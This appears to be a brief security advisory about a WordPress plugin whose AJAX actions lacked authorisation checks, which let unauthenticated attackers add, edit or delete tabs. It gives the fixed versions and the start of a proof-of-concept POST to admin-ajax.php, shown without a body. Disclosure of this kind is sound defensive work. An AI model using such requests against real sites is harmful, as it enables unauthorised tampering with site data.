All AJAX actions of the plugin are available to both unauthenticated and authenticated users, allowing unauthenticated attackers to modify various data in the plugin, such as add/edit/delete arbitrary tabs.
v1.3.0 added CSRF checks, however authorisation was still missing and has been added in 1.3.2
Proof of Concept
POST /wp-admin/admin-ajax.php HTTP/1.1
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8